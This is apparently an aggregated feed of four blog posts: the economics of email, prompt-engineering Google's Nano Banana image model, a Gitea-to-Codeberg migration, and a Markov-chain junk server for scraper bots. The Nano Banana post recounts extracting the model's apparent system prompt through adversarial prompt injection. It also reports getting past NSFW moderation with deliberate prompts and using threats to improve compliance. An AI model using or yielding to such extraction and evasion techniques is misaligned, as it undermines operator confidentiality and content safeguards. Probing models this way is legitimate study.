Emails, just like websites, use a basic communication protocol to function. For you to land on this website, your browser somehow communicated with my web server, did some negotiating, and then my server sent HTML data that your browser rendered on the page. But what about email? Is the process any different? The short answer is no. Email and the web work in remarkably similar fashion. Here's the short version: In order to send me an email, your email client takes the email address you provide, connects to my server, does some negotiating, and then my server accepts the email content you intended to send and saves it. My email client will then take that saved content and notify me that I have a new message from you. That's it. That's how email works. So what's the big fuss about? Why are email services charging $45 just to send ~1,500 emails? Why is it so expensive, while I can serve millions of requests a day on my web server for a fraction of the cost? The short answer is spam . But before we get to spam, let's get into the details I've omitted from the examples above, the negotiations, and see just how similar email and web traffic really are.

When you type a URL into your browser and hit enter, here's what happens:

1. DNS Lookup : Your browser asks a DNS server, "What's the IP address for this domain?" The DNS server responds with something like .
2. Connection : Your browser establishes a TCP connection with that IP address on port 80 (HTTP) or port 443 (HTTPS).
3. Request : Your browser sends an HTTP request: "GET /blog-post HTTP/1.1"
4. Response : My web server processes the request and sends back the HTML, CSS, and JavaScript that make up the page.
5. Rendering : Your browser receives this data and renders it on your screen.

The entire exchange is direct, simple, and happens in milliseconds. Now let's look at email. The process is similar:

1. DNS Lookup : Your email client takes my email address ( ) and asks a DNS server, "What's the mail server for example.com?" The DNS server responds with an MX (Mail Exchange) record pointing to my mail server's address.
2. Connection : Your email client (or your email provider's server) establishes a TCP connection with my mail server on port 25 (SMTP) or port 587 (for authenticated SMTP).
3. Negotiation (SMTP) : Your server says "HELO, I have a message for [email protected]." My server responds: "OK, send it."
4. Transfer : Your server sends the email content, headers, body, attachments, using the Simple Mail Transfer Protocol (SMTP).
5. Storage : My mail server accepts the message and stores it in my mailbox, which can be a simple text file on the server.
6. Retrieval : Later, when I open my email client, it connects to my server using IMAP (port 993) or POP3 (port 110) and asks, "Any new messages?" My server responds with your email, and my client displays it.

Both HTTP and email use DNS to find servers, establish TCP connections, exchange data using text-based protocols, and deliver content to the end user. They're built on the same fundamental internet technologies. So if email is just as simple as serving a website, why does it cost so much more? The answer lies in a problem that both systems share but handle very differently: unwanted third-party writes. Both web servers and email servers allow outside parties to send them data. Web servers accept form submissions, comments, API requests, and user-generated content. Email servers accept messages from any other email server on the internet. In both cases, this openness creates an opportunity for abuse.

Spam isn't unique to email, it's everywhere. My blog used to get around 6,000 spam comments on a daily basis. On the greater internet, you will see spam comments on blogs, spam account registrations, spam API calls, spam form submissions, and yes, spam emails. The main difference is visibility. When spam protection works well, it's invisible. You visit websites every day without realizing that, behind the scenes, CAPTCHAs are blocking bot submissions, rate limiters are rejecting suspicious traffic, and content filters are catching spam comments before they're published. You don't get to see the thousands of spam attempts that happen every day on my blog, because of some filtering I've implemented. On a well-run web server, the work is invisible. The same is true for email. A well-run email server silently:

- Checks sender reputation against blacklists
- Validates SPF, DKIM, and DMARC records
- Scans message content for spam signatures
- Filters out malicious attachments
- Quarantines suspicious senders

There is a massive amount of spam. In fact, spam accounts for roughly 45-50% of all email traffic globally . But when the system works, you simply don't see it. If we can combat spam on the web without charging exorbitant fees, email spam shouldn't be that different. The technical challenges are very similar:

- Both require reputation systems
- Both need content filtering
- Both face distributed abuse
- Both require infrastructure to handle high volume

Yet a basic web server on a $5/month VPS can handle millions of requests with minimal spam-fighting overhead. Meanwhile, sending 1,500 emails costs $29-45 per month through commercial services. The difference isn't purely technical. It's about reputation, deliverability networks, and the ecosystem that has evolved around email. Email providers have created a cartel-like system where your ability to reach inboxes depends on your server's reputation, which is nearly impossible to establish as a newcomer. They've turned a technical problem (spam) into a business moat. And we're all paying for it.

Email isn't inherently more complex or expensive than web hosting. Both the protocols and the infrastructure are similar, and the spam problem exists in both domains. The cost difference is mostly artificial. It's the result of an ecosystem that has consolidated around a few major providers who control deliverability. It doesn't help that Intuit owns Mailchimp now. Understanding this doesn't necessarily change the fact that you'll probably still need to pay for email services if you want reliable delivery. But it should make you question whether that $45 monthly bill is really justified by the technical costs involved. Or whether it's just the price of admission to a gatekept system.

Max Woolf 2 weeks ago

Nano Banana can be prompt engineered for extremely nuanced AI image generation

You may not have heard about new AI image generation models as much lately, but that doesn’t mean that innovation in the field has stagnated: it’s quite the opposite. FLUX.1-dev immediately overshadowed the famous Stable Diffusion line of image generation models, while leading AI labs have released models such as Seedream , Ideogram , and Qwen-Image . Google also joined the action with Imagen 4 . But all of those image models are vastly overshadowed by ChatGPT’s free image generation support, launched in March 2025. After a particular prompt went organically viral on social media, ChatGPT became the new benchmark for how most people perceive AI-generated images, for better or for worse. The model has its own image “style” for common use cases, which makes it easy to identify that ChatGPT made it. Two sample generations from ChatGPT. ChatGPT image generations often have a yellow hue in their images. Additionally, cartoons and text often have the same linework and typography. Of note, the model underlying ChatGPT’s image generation is an autoregressive model. While most image generation models are diffusion-based to reduce the amount of compute needed to train and generate from such models, it works by generating tokens in the same way that ChatGPT generates the next token, then decoding them into an image. It’s extremely slow at about 30 seconds to generate each image at the highest quality (the default in ChatGPT), but it’s hard for most people to argue with free. In August 2025, a new mysterious text-to-image model appeared on LMArena : a model code-named “nano-banana”. This model was eventually publicly released by Google as Gemini 2.5 Flash Image , an image generation model that works natively with their Gemini 2.5 Flash model. Unlike Imagen 4, it is indeed autoregressive, generating 1,290 tokens per image.
After Nano Banana’s popularity pushed the Gemini app to the top of the mobile App Stores, Google eventually made Nano Banana the colloquial name for the model, as it’s definitely more catchy than “Gemini 2.5 Flash Image”. The first screenshot on the iOS App Store for the Gemini app. Personally, I care little about which image generation AI the leaderboards say looks the best. What I do care about is how well the AI adheres to the prompt I provide: if the model can’t follow the requirements I desire for the image—my requirements are often specific —then the model is a nonstarter for my use cases. At the least, if the model does have strong prompt adherence, any “looking bad” aspect can be fixed with prompt engineering and/or traditional image editing pipelines. After running Nano Banana through its paces with my comically complex prompts, I can confirm that thanks to Nano Banana’s robust text encoder, it has such extremely strong prompt adherence that Google has understated how well it works. Like ChatGPT, Google offers methods to generate images for free from Nano Banana. The most popular method is through Gemini itself, either on the web or in a mobile app, by selecting the “Create Image 🍌” tool. Alternatively, Google also offers free generation in Google AI Studio when Nano Banana is selected on the right sidebar, which also allows for setting generation parameters such as image aspect ratio and is therefore my recommendation. In both cases, the generated images have a visible watermark in the bottom right corner of the image. For developers who want to build apps that programmatically generate images from Nano Banana, Google offers the endpoint on the Gemini API . Each image generated costs roughly $0.04/image for a 1 megapixel image (e.g. 1024x1024 if a 1:1 square): on par with most modern popular diffusion models despite being autoregressive, and much cheaper than ChatGPT’s model at $0.17/image.
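To put those prices in context, a quick back-of-envelope sketch using only the per-image figures quoted above (prices as quoted here; they may change):

```python
# Nano Banana emits 1,290 tokens per image at roughly $0.04/image via the
# Gemini API, versus the $0.17/image quoted for ChatGPT's image model.
TOKENS_PER_IMAGE = 1290
NANO_BANANA_PER_IMAGE = 0.04
CHATGPT_PER_IMAGE = 0.17

def batch_cost(n_images: int, per_image: float) -> float:
    """Cost in dollars of generating n_images, rounded to cents."""
    return round(n_images * per_image, 2)

print(batch_cost(100, NANO_BANANA_PER_IMAGE))  # 4.0
print(batch_cost(100, CHATGPT_PER_IMAGE))      # 17.0
```

A hundred test generations is lunch money on Nano Banana, which matters when you iterate on prompts as heavily as this post does.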
Working with the Gemini API is a pain and requires annoying image encoding/decoding boilerplate, so I wrote and open-sourced a Python package: gemimg , a lightweight wrapper around the Gemini API’s Nano Banana endpoint that lets you generate images with a simple prompt, in addition to handling cases such as image input along with text prompts. I chose to use the Gemini API directly despite protests from my wallet for three reasons: a) web UIs to LLMs often have system prompts that interfere with user inputs and can give inconsistent output, b) using the API will not show a visible watermark in the generated image, and c) I have some prompts in mind that are…inconvenient to put into a typical image generation UI. Let’s test Nano Banana out, but since we want to test prompt adherence specifically, we’ll start with more unusual prompts. My go-to test case is: I like this prompt because not only is it an absurd prompt that gives the image generation model room to be creative, but the AI model also has to handle the maple syrup and how it would logically drip down from the top of the skull pancake and adhere to the bony breakfast. The result: That is indeed in the shape of a skull and is indeed made out of pancake batter, blueberries are indeed present on top, and the maple syrup does indeed drip down from the top of the pancake while still adhering to its unusual shape, albeit with some trails of syrup that disappear/reappear. It’s one of the best results I’ve seen for this particular test, and it’s one that doesn’t have obvious signs of “AI slop” aside from the ridiculous premise. Now, we can try another one of Nano Banana’s touted features: editing. Image editing, where the prompt targets specific areas of the image while leaving everything else as unchanged as possible, has been difficult with diffusion-based models until very recently with Flux Kontext .
Autoregressive models in theory should have an easier time doing so, as they have a better understanding of tweaking the specific tokens that correspond to areas of the image. While most image editing approaches encourage using a single edit command, I want to challenge Nano Banana. Therefore, I gave Nano Banana the generated skull pancake, along with five edit commands simultaneously: All five of the edits are implemented correctly with only the necessary aspects changed, such as removing the blueberries on top to make room for the mint garnish, and the pooling of the maple syrup on the new cookie-plate is adjusted. I’m legit impressed. Now we can test more difficult instances of prompt engineering. One of the most compelling-but-underdiscussed use cases of modern image generation models is being able to put the subject of an input image into another scene. For open-weights image generation models, it’s possible to “train” the models to learn a specific subject or person even if they are not notable enough to be in the original training dataset, using a technique such as finetuning the model with a LoRA on only a few sample images of your desired subject. Training a LoRA is not only very computationally intensive/expensive, but it also requires care and precision and is not guaranteed to work—speaking from experience. Meanwhile, if Nano Banana can achieve the same subject consistency without requiring a LoRA, that opens up many fun opportunities. Way back in 2022, I tested a technique that predated LoRAs known as textual inversion on the original Stable Diffusion in order to add a very important concept to the model: Ugly Sonic , from the initial trailer for the Sonic the Hedgehog movie back in 2019. One of the things I really wanted Ugly Sonic to do is to shake hands with former U.S. President Barack Obama , but that didn’t quite work out as expected. 2022 was a now-unrecognizable time where absurd errors in AI were celebrated.
Can the real Ugly Sonic finally shake Obama’s hand? Of note, I chose this test case to assess image generation prompt adherence because image models may assume I’m prompting the original Sonic the Hedgehog and ignore the aspects of Ugly Sonic that are distinct to only him. Specifically, I’m looking for: I also confirmed that Ugly Sonic is not surfaced by Nano Banana, and prompting as such just makes a Sonic that is ugly, purchasing a back alley chili dog. I gave Gemini the two images of Ugly Sonic above (a close-up of his face and a full-body shot to establish relative proportions) and this prompt: That’s definitely Obama shaking hands with Ugly Sonic! That said, there are still issues: the color grading/background blur is too “aesthetic” and less photorealistic, Ugly Sonic has gloves, and Ugly Sonic is insufficiently lanky. Back in the days of Stable Diffusion, the use of prompt engineering buzzwords to generate “better” images in light of weak prompt text encoders was very controversial, because it was difficult both subjectively and intuitively to determine if they actually generated better pictures. Obama shaking Ugly Sonic’s hand would be a historic event. What would happen if it were covered by The New York Times ? I added to the previous prompt: So there are a few notable things going on here: That said, I only wanted the image of Obama and Ugly Sonic and not the entire New York Times A1. Can I just append to the previous prompt and have that be enough to generate only the image while maintaining the compositional bonuses? I can! The gloves are gone and his chest is white, although Ugly Sonic looks out-of-place in the unintentional sense. As an experiment, instead of only feeding two images of Ugly Sonic, I fed Nano Banana all the images of Ugly Sonic I had ( seventeen in total), along with the previous prompt. This is an improvement over the previous generated image: no eyebrows, white hands, and a genuinely uncanny vibe.
Again, there aren’t many obvious signs of AI generation here: Ugly Sonic clearly has five fingers! That’s enough Ugly Sonic for now, but let’s recall what we’ve observed so far. There are two noteworthy things in the prior two examples: the use of a Markdown dashed list to indicate rules when editing, and the fact that specifying as a buzzword did indeed improve the composition of the output image. Many don’t know how image generation models actually encode text. In the case of the original Stable Diffusion, it used CLIP , whose text encoder, open-sourced by OpenAI in 2021, unexpectedly paved the way for modern AI image generation. It is extremely primitive relative to modern standards for transformer-based text encoding, and only has a context limit of 77 tokens: a couple of sentences, which is sufficient for the image captions it was trained on but not for nuanced input. Some modern image generators use T5 , an even older experimental text encoder released by Google that supports 512 tokens. Although modern image models can compensate for the age of these text encoders through robust data annotation while training the underlying image models, the text encoders cannot compensate for highly nuanced text inputs that fall outside the domain of general image captions. A marquee feature of Gemini 2.5 Flash is its support for agentic coding pipelines; to accomplish this, the model must be trained on extensive amounts of Markdown (which defines code repository documentation and agentic behaviors) and JSON (which is used for structured output/function calling/MCP routing). Additionally, Gemini 2.5 Flash was also explicitly trained to understand objects within images, giving it the ability to create nuanced segmentation masks . Nano Banana’s multimodal encoder, as an extension of Gemini 2.5 Flash, should in theory be able to leverage these properties to handle prompts beyond the typical image-caption-esque prompts.
That’s not to mention the vast annotated image training datasets Google owns as a byproduct of Google Images and likely trained Nano Banana upon, which should allow it to semantically differentiate between an image that matches a given buzzword and one that doesn’t. Let’s give Nano Banana a relatively large and complex prompt, drawing from the learnings above, and see how well it adheres to the nuanced rules specified by the prompt: This prompt has everything : specific composition and descriptions of different entities, the use of hex colors instead of a natural language color, a heterochromia constraint which requires the model to deduce the colors of each corresponding kitten’s eye from earlier in the prompt, and a typo of “San Francisco” that is definitely intentional. Each and every rule specified is followed. For comparison, I gave the same command to ChatGPT—which in theory has similar text encoding advantages as Nano Banana—and the results are worse both compositionally and aesthetically, with more tells of AI generation. 1 The yellow hue certainly makes the quality differential more noticeable. Additionally, no negative space is utilized, and only the middle cat has heterochromia, but with the incorrect colors. Another thing about the text encoder is how the model generated unique relevant text in the image without being given the text within the prompt itself: we should test this further. If the base text encoder is indeed trained for agentic purposes, it should at minimum be able to generate an image of code. Let’s say we want to generate an image of a minimal recursive Fibonacci sequence in Python. I gave Nano Banana this prompt: It tried to generate the correct corresponding code but the syntax highlighting/indentation didn’t quite work, so I’ll give it a pass. Nano Banana is definitely generating code, and was able to maintain the other compositional requirements.
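For reference, a minimal recursive Fibonacci implementation of the kind the prompt describes would look something like:

```python
# The "minimal recursive Fibonacci sequence in Python" that Nano Banana
# was asked to render as an image:
def fib(n: int) -> int:
    if n < 2:
        return n
    return fib(n - 1) + fib(n - 2)

print([fib(i) for i in range(10)])  # [0, 1, 1, 2, 3, 5, 8, 13, 21, 34]
```

A handful of lines, which is exactly why it makes a good test of whether an image model can render coherent code at all.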
For posterity, I gave the same prompt to ChatGPT: It did a similar attempt at the code, which indicates that code generation is indeed a fun quirk of multimodal autoregressive models. I don’t think I need to comment on the quality difference between the two images. An alternate explanation for text-in-image generation in Nano Banana would be the presence of prompt augmentation or a prompt rewriter, both of which are used to orient a prompt to generate more aligned images. Tampering with the user prompt is common with image generation APIs and isn’t an issue unless used poorly (which caused a PR debacle for Gemini last year), but it can be very annoying for testing. One way to verify if it’s present is to use adversarial prompt injection to get the model to output the prompt itself, e.g. if the prompt is being rewritten, asking it to generate the text “before” the prompt should get it to output the original prompt. That’s, uh, not the original prompt. Did I just leak Nano Banana’s system prompt completely by accident? The image is hard to read, but if it is the system prompt—the use of section headers implies it’s formatted in Markdown—then I can surgically extract parts of it to see just how the model ticks: These seem to track, but I want to learn more about those buzzwords in point #3: Huh, there’s a guard specifically against buzzwords? That seems unnecessary: my guess is that this rule is a hack intended to avoid the perception of model collapse by avoiding the generation of 2022-era AI images, which would be annotated with those buzzwords. As an aside, you may have noticed the ALL CAPS text in this section, along with a command. There is a reason I have been sporadically capitalizing in previous prompts: all caps does indeed work to ensure better adherence to the prompt (both for text and image generation), 2 and threats do tend to improve adherence.
Some have called it sociopathic, but this generation is proof that this brand of sociopathy is approved by Google’s top AI engineers. Tangent aside, since “previous” text didn’t reveal the prompt, we should check the “current” text: That worked, with one peculiar problem: the text “image” is flat-out missing, which raises further questions. Is “image” parsed as a special token? Maybe prompting “generate an image” to a generative image AI is a mistake. I tried the last logical prompt in the sequence: …which always raises an error: not surprising if there is no text after the original prompt. This section turned out unexpectedly long, but it’s enough to conclude that Nano Banana definitely shows indications of benefitting from being trained on more than just image captions. Some aspects of Nano Banana’s system prompt imply the presence of a prompt rewriter, but if there is indeed a rewriter, I am skeptical it is triggering in this scenario, which implies that Nano Banana’s text generation is indeed linked to its strong base text encoder. But just how large and complex can we make these prompts and still have Nano Banana adhere to them? Nano Banana supports a context window of 32,768 tokens: orders of magnitude above T5’s 512 tokens and CLIP’s 77 tokens. The intent of this large context window for Nano Banana is multiturn conversations in Gemini, where you can chat back-and-forth with the LLM on image edits. Given Nano Banana’s prompt adherence on small complex prompts, how well does the model handle larger-but-still-complex prompts? Can Nano Banana render a webpage accurately? I used a LLM to generate a bespoke single-page HTML file representing a Counter app, available here . The web page uses only vanilla HTML, CSS, and JavaScript, meaning that Nano Banana would need to figure out how they all relate in order to render the web page correctly. For example, the web page uses CSS Flexbox to set the ratio of the sidebar to the body at 1/3 and 2/3 respectively.
Feeding this prompt to Nano Banana: That’s honestly better than expected, and the prompt cost 916 tokens. It got the overall layout and colors correct: the issues are more in the text typography, leaked classes/styles/JavaScript variables, and the sidebar:body ratio. No, there’s no practical use for having a generative AI render a webpage, but it’s a fun demo. A similar approach that does have a practical use is providing structured, extremely granular descriptions of objects for Nano Banana to render. What if we provided Nano Banana a JSON description of a person with extremely specific details, such as hair volume, fingernail length, and calf size? As with prompt buzzwords, JSON prompting AI models is a very controversial topic, since images are not typically captioned with JSON, but there’s only one way to find out. I wrote a prompt augmentation pipeline of my own that takes in a user-input description of a quirky human character, e.g. a Mage, and outputs a very long and detailed JSON object representing that character with a strong emphasis on unique character design. 3 But generating a Mage is boring, so I asked my script to generate a male character that is an equal combination of a Paladin, a Pirate, and a Starbucks Barista: the resulting JSON is here . The prompt I gave to Nano Banana to generate a photorealistic character was: Beforehand, I admit I didn’t know what a Paladin/Pirate/Starbucks Barista would look like, but he is definitely a Paladin/Pirate/Starbucks Barista. Let’s compare against the input JSON, taking elements from all areas of the JSON object (about 2,600 tokens total) to see how well Nano Banana parsed it: Checking the JSON field-by-field, the generation also fits most of the smaller details noted. However, he is not photorealistic, which is what I was going for.
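For a sense of what such a prompt looks like, here is a hypothetical, heavily abbreviated character sheet. Every field name below is invented for illustration and is not taken from the actual generated JSON:

```python
import json

# A hypothetical miniature of the JSON character sheet described above.
# The real generated object (~2,600 tokens) is far longer and more detailed.
character = {
    "concept": "equal parts Paladin, Pirate, and Starbucks Barista",
    "physique": {"build": "broad", "calf_size": "prominent"},
    "hair": {"volume": "high", "style": "windswept"},
    "hands": {"fingernail_length": "short", "holding": "cutlass"},
    "wardrobe": {
        "armor": "polished breastplate",
        "accents": ["tricorn hat", "green barista apron"],
    },
}

# The serialized JSON becomes the bulk of the image prompt:
prompt = (
    "Generate a photorealistic image of the character described by this JSON:\n"
    + json.dumps(character, indent=2)
)
print(prompt.splitlines()[0])
```

The point of the structure is that each leaf value is an independently checkable constraint, which is what makes the field-by-field comparison above possible.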
One curious behavior I found is that any approach to generating an image of a high fantasy character in this manner has a very high probability of resulting in a digital illustration, even after changing the target publication and adding “do not generate a digital illustration” to the prompt. The solution requires a more clever approach to prompt engineering: add phrases and compositional constraints that imply a heavy physicality to the image, such that a digital illustration would have more difficulty satisfying all of the specified conditions than a photorealistic generation: The image style is definitely closer to Vanity Fair (the photographer is reflected in his breastplate!), and most of the attributes in the previous illustration also apply—the hands/cutlass issue is also fixed. Several elements such as the shoulderplates are different, but not in a manner that contradicts the JSON field descriptions: perhaps that’s a sign that these JSON fields can be prompt engineered to be even more nuanced. Yes, prompting image generation models with HTML and JSON is silly, but “it’s not silly if it works” describes most of modern AI engineering. Nano Banana allows for very strong generation control, but there are several issues. Let’s go back to the original example that made ChatGPT’s image generation go viral. I ran that exact prompt through Nano Banana on a mirror selfie of myself: …I’m not giving Nano Banana a pass this time. Surprisingly, Nano Banana is terrible at style transfer even with prompt engineering shenanigans, which is not the case with any other modern image editing model. I suspect that the autoregressive properties that allow Nano Banana’s excellent text editing make it too resistant to changing styles. That said, creating a new image does in fact work as expected, and creating a new image using the character provided in the input image with the specified style (as opposed to a style transfer) has occasional success.
Speaking of that, Nano Banana has essentially no restrictions on intellectual property, as the examples throughout this blog post have made evident. Not only will it not refuse to generate images from popular IP like ChatGPT now does, you can have many different IPs in a single image. Normally, Optimus Prime is the designated driver. I am not a lawyer, so I cannot litigate the legalities of training/generating IP in this manner or whether intentionally specifying an IP in a prompt but also stating “do not include any watermarks” is a legal issue: my only goal is to demonstrate what is currently possible with Nano Banana. I suspect that if precedent is set from existing IP lawsuits against OpenAI and Midjourney , Google will be in line to be sued. Another note is moderation of generated images, particularly around NSFW content, which is always important to check if your application uses untrusted user input. As with most image generation APIs, moderation is done against both the text prompt and the raw generated image. That said, while running my standard test suite for new image generation models, I found that Nano Banana is surprisingly one of the more lenient AI APIs. With some deliberate prompts, I can confirm that it is possible to generate NSFW images through Nano Banana—obviously I cannot provide examples. I’ve spent a very large amount of time overall with Nano Banana and although it has a lot of promise, some may ask why I am writing about how to use it to create highly-specific, high-quality images during a time when generative AI has threatened creative jobs. The reason is that the information asymmetry between what generative image AI can and can’t do has only grown in recent months: many still think that ChatGPT is the only way to generate images and that all AI-generated images are wavy AI slop with a piss yellow filter. The only way to counter this perception is through evidence and reproducibility.
That is why not only am I releasing Jupyter Notebooks detailing the image generation pipeline for each image in this blog post, but also why I included the prompts in this blog post proper; I apologize that it padded the length of the post to 26 minutes, but it’s important to show that these image generations are as advertised and not the result of AI boosterism. You can copy these prompts and paste them into AI Studio and get similar results, or even hack and iterate on them to find new things. Most of the prompting techniques in this blog post are already well-known by AI engineers far more skilled than myself, and turning a blind eye won’t stop people from using generative image AI in this manner.

I didn’t go into this blog post expecting it to be a journey, but sometimes the unexpected journeys are the best journeys. There are many cool tricks with Nano Banana I cut from this blog post due to length, such as providing an image to specify character positions, and investigations of styles such as pixel art that most image generation models struggle with but Nano Banana now nails. These prompt engineering shenanigans are only the tip of the iceberg. Jupyter Notebooks for the generations used in this post are split between the gemimg repository and a second testing repository .

I would have preferred to compare the generations directly from the endpoint for an apples-to-apples comparison, but OpenAI requires organization verification to access it, and I am not giving OpenAI my legal ID.  ↩︎

Note that ALL CAPS will not work with CLIP-based image generation models at a technical level, as CLIP’s text encoder is uncased.  ↩︎

Although normally I open-source every script I write for my blog posts, I cannot open-source the character generation script due to extensive testing showing it may lean too heavily into stereotypes.
Although adding guardrails successfully reduces the presence of said stereotypes and makes the output more interesting, there may be unexpected negative externalities if open-sourced.  ↩︎

- A lanky build, as opposed to the real Sonic’s chubby build.
- A white chest, as opposed to the real Sonic’s beige chest.
- Blue arms with white hands, as opposed to the real Sonic’s beige arms with white gloves.
- Small pasted-on-his-head eyes with no eyebrows, as opposed to the real Sonic’s large recessed eyes and eyebrows.

That is the most cleanly-rendered New York Times logo I’ve ever seen. It’s safe to say that Nano Banana trained on the New York Times in some form. Nano Banana is still bad at rendering text perfectly/without typos, as are most image generation models. However, the expanded text is peculiar: it does follow from the prompt, although “Blue Blur” is a nickname for the normal Sonic the Hedgehog. How does an image generation model generate logical text unprompted anyways?

Ugly Sonic is even more like normal Sonic in this iteration: I suspect the “Blue Blur” may have anchored the autoregressive generation to be more Sonic-like. The image itself does appear to be more professional, and notably has the distinct composition of a photo from a professional news photographer: adherence to the “rule of thirds”, good use of negative space, and better color balance. Mostly check (the hands are transposed and the cutlass disappears).

Brain Baking 2 weeks ago

Migrating From Gitea To Codeberg

After last week’s Gitea attack debacle , moving all things Git off the VPS became a top priority. In 2022, like many of you, I gave up GitHub and spun up two Gitea instances myself: a private one safely behind bars on the NAS and a public one where all my public GitHub projects were moved to. Three years later, I think it’s time to move again.

Gitea was forked into Forgejo a few years ago because of yet another licensing drama, but I just couldn’t be bothered with keeping everything up to date. So I didn’t. And then Gitea started acting annoying: artifact folders weren’t properly cleaned up, even though I encouraged it to do so in the configuration, up to the point that the files clogged up the entire disk. The result was crashes of nearly everything, as there weren’t even a few bytes of space left to append to logs. And then bots started scraping the hell out of the commit endpoints.

Anyway, I liked Gitea/Forgejo’s ease of use, so migrating everything off-site to Codeberg seemed like the most obvious solution. I’ve been wanting to go back to a coding community for a while now: if you host your own Gitea instance, you isolate yourself from the rest of the open source world. Collaboration is still easiest on GitHub, as simply everyone is hanging out there, but I’d rather stop coding entirely than feed Microsoft’s AI. Give Up GitHub, folks.

The steps involved in the migration were surprisingly easy and fast to execute:

1. Create a Codeberg account.
2. Generate a temporary access token on your to-be-defunct Gitea instance: see https://docs.gitea.com/development/api-usage for the exact command.
3. For each repository to migrate: click on your profile, and instead of creating a new blank repository, select “from migration” or go to URL https://codeberg.org/repo/migrate . Select Gitea, fill in the Git endpoint and access token and press migrate . Optionally, also migrate LFS/Wikis/issues/whatever by checking the appropriate boxes.
4. Re-archive the repositories that were publicly archived.

Congratulations, you’re now the proud owner of Codeberg repositories. From here, we now have to decide what to do with the old Gitea instance. Do you want to simply kill it? Do you want to mirror your repositories? Or temporarily forward using the same URLs?

Since I don’t want to keep it around forever and wanted to stop it immediately, but not yet break all URLs, I rewrote the Nginx location to a redirect. This redirects the old URL to the new correct location https://codeberg.org/wouterg/brainbaking , but it does not fix that Git will not follow redirects by default. You can proxy the entire thing and add more headers to fix that, or tell Git to follow redirects instead, or just change the remote URL and be done with it. I figured not a lot of folks have cloned copies of my repositories on their hard drives—and if you do, you’d probably go looking online for the correct version and remove/reclone the entire thing.

Next, it is time to kill the Gitea instance. Set a reminder in your calendar to remove the redirect and clean up your VPS in a month or two, just to be sure. I should have enough backups in case things go wrong but you never know.

The final piece of the puzzle is a financial one. Codeberg is a non-profit organisation that relies entirely on donations to keep things spinning, and I reckon they also need resources to fight those pesky AI crawlers (they’re also using Anubis, by the way). Consider donating or even becoming an active member, which also allows you to vote when strategic decisions are being made.

Go library programmers, don’t forget to double-check your import paths. So-called “vanity imports” ease friction here, as you can set up a redirect from there, so existing import paths should still work. I rely on vangen to generate simple HTML pages for import paths. In the future, I’d rather move these paths to avoid cluttering up Hugo’s folder.

By Wouter Groeneveld on 13 November 2025.  Reply via email .
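The Nginx redirect could look something like the following. This is a minimal sketch of my own, not the author's actual config; the old hostname is a placeholder:

```nginx
# Old Gitea vhost, now only issuing permanent redirects to Codeberg.
# git.example.com stands in for the original Gitea hostname.
server {
    listen 443 ssl;
    server_name git.example.com;

    location / {
        # /wouterg/brainbaking -> https://codeberg.org/wouterg/brainbaking
        return 301 https://codeberg.org$request_uri;
    }
}
```

For existing clones, `git remote set-url origin https://codeberg.org/wouterg/brainbaking` points them straight at the new home; alternatively, `git config http.followRedirects true` tells Git to follow the 301.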

Herman's blog 2 weeks ago

Messing with bots

As outlined in my previous two posts : scrapers are, inadvertently, DDoSing public websites. I’ve received a number of emails from people running small web services and blogs seeking advice on how to protect themselves. This post isn’t about that. This post is about fighting back.

When I published my last post, there was an interesting write-up doing the rounds about a guy who set up a Markov chain babbler to feed the scrapers endless streams of generated data. The idea here is that these crawlers are voracious, and if given a constant supply of junk data, they will continue consuming it forever, while (hopefully) not abusing your actual web server. This is a pretty neat idea, so I dove down the rabbit hole and learnt about Markov chains, and even picked up Rust in the process. I ended up building my own babbler that could be trained on any text data, and would generate realistic-looking content based on that data.

Now, the AI scrapers are actually not the worst of the bots. The real enemy, at least to me, are the bots that scrape with malicious intent. I get hundreds of thousands of requests for the kinds of paths that could potentially signal a misconfigured Wordpress instance. These people are the real baddies. Generally I just block these requests with a 403 response. But since they want php files, why don’t I give them what they want?

I trained my Markov chain on a few hundred php files, and set it to generate. The responses certainly look like php at a glance, but on closer inspection they’re obviously fake. I set it up to run on an isolated project of mine, while incrementally increasing the size of the generated php files from 2kb to 10mb just to test the waters. Here’s a sample 1kb output:

I had two goals here. The first was to waste as much of the bot’s time and resources as possible, so the larger the file I could serve, the better.
The second goal was to make it realistic enough that the actual human behind the scrape would take some time away from kicking puppies (or whatever they do for fun) to try to figure out if there was an exploit to be had.

Unfortunately, an arms race of this kind is a battle of efficiency. If someone can scrape more efficiently than I can serve, then I lose. And while serving a 4kb bogus php file from the babbler was pretty efficient, as soon as I started serving 1mb files from my VPS the responses started hitting the hundreds of milliseconds and my server struggled under even moderate loads. This led to another idea: what is the most efficient way to serve data? As a static site (or something similar). So down another rabbit hole I went, writing an efficient garbage server.

I started by loading the full text of the classic Frankenstein novel into an array in RAM where each paragraph is a node. Then on each request it selects a random index and the subsequent 4 paragraphs to display. Each post would then have a link to 5 other “posts” at the bottom that all technically call the same endpoint, so I don’t need an index of links. These 5 posts, when followed, quickly saturate most crawlers, since breadth-first crawling explodes quickly, in this case by a factor of 5. You can see it in action here: https://herm.app/babbler/ This is very efficient, and can serve endless posts of spooky content. The reason for choosing this specific novel is fourfold:

I made sure to add noindex/nofollow attributes to all these pages, as well as in the links, since I only want to catch bots that break the rules. I’ve also added a counter at the bottom of each page that counts the number of requests served. It resets each time I deploy, since the counter is stored in memory, but I’m not connecting this to a database, and it works. With this running, I did the same for php files, creating a static server that would serve a different (real) file from memory on request.
You can see this running here: https://herm.app/babbler.php (or any path with .php in it). There’s a counter at the bottom of each of these pages as well. As Maury said: “Garbage for the garbage king!”

Now with the fun out of the way, a word of caution. I don’t have this running on any project I actually care about; https://herm.app is just a playground of mine where I experiment with small ideas. I originally intended to run this on a bunch of my actual projects, but while building this, reading threads, and learning about how scraper bots operate, I came to the conclusion that running this can be risky for your website. The main risk is that despite correctly using robots.txt, noindex, and nofollow rules, there’s still a chance that Googlebot or other search engine scrapers will scrape the wrong endpoint and determine you’re spamming. If you or your website depend on being indexed by Google, this may not be viable. It pains me to say it, but the gatekeepers of the internet are real, and you have to stay on their good side, or else. This doesn’t just affect your search rankings, but could potentially add a warning to your site in Chrome, with the only recourse being a manual appeal.

However, this applies only to the post babbler. The php babbler is still fair game, since Googlebot ignores non-HTML pages, and the only bots looking for php files are malicious. So if you have a little web-project that is being needlessly abused by scrapers, these projects are fun! For the rest of you, probably stick with 403s. What I’ve done as a compromise is added the following hidden link on my blog, and another small project of mine, to tempt the bad scrapers:

The only thing I’m worried about now is running out of Outbound Transfer budget on my VPS. If I get close I’ll cache it with Cloudflare, at the expense of the counter. This was a fun little project, even if there were a few dead ends.
I know more about Markov chains and scraper bots, and had a great time learning, despite it being fuelled by righteous anger. Not all threads need to lead somewhere pertinent. Sometimes we can just do things for fun.

- I was working on this on Halloween.
